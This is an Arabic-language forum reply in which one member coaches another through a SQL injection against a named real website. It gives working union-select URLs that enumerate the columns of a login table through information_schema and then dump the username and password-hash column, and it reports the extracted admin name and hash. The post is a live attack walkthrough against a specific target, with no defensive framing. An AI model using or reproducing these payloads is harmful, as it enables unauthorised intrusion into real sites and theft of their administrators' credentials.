السلام عليكم اخي الكريم
اخي انت عملت هيك يعني طلعت الباس ورقم العضوية
concat)userid,0x3a,hashpass(
اخي الكريم ركز فقط في الحقنة استعمل الامر group_
ليصبح الاستغلال كذا
كود:
http://www.ach.org.il/news.php?id=-1+union+select+1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4++from+information_schema.columns+where+table_name=0x61706f735f6c6f67696e32--
الان طلعت معاي كل اليوزرات نشوف فيهم مين هي الانسب
apos_login2:userid:church_sitedb,
apos_login2:username:church_sitedb,
apos_login2:hashpass:church_sitedb,
apos_login2:counter:church_sitedb
انا اشوف الانسب الى يوزر الادمن هي username
يعني راح يكون الاستغلال
كود:
http://www.ach.org.il/news.php?id=-1+union+select+1,2,concat(username,0x3a,hashpass),4++from+apos_login2--
يغني concat(username,0x3a,hashpass)
اسم الادمن طلع AMiN
والباسورد طلع 1a5s6d456zxc456xz4c56xz4c46c
ان شاء الله اكون فدتك ولو بالقليل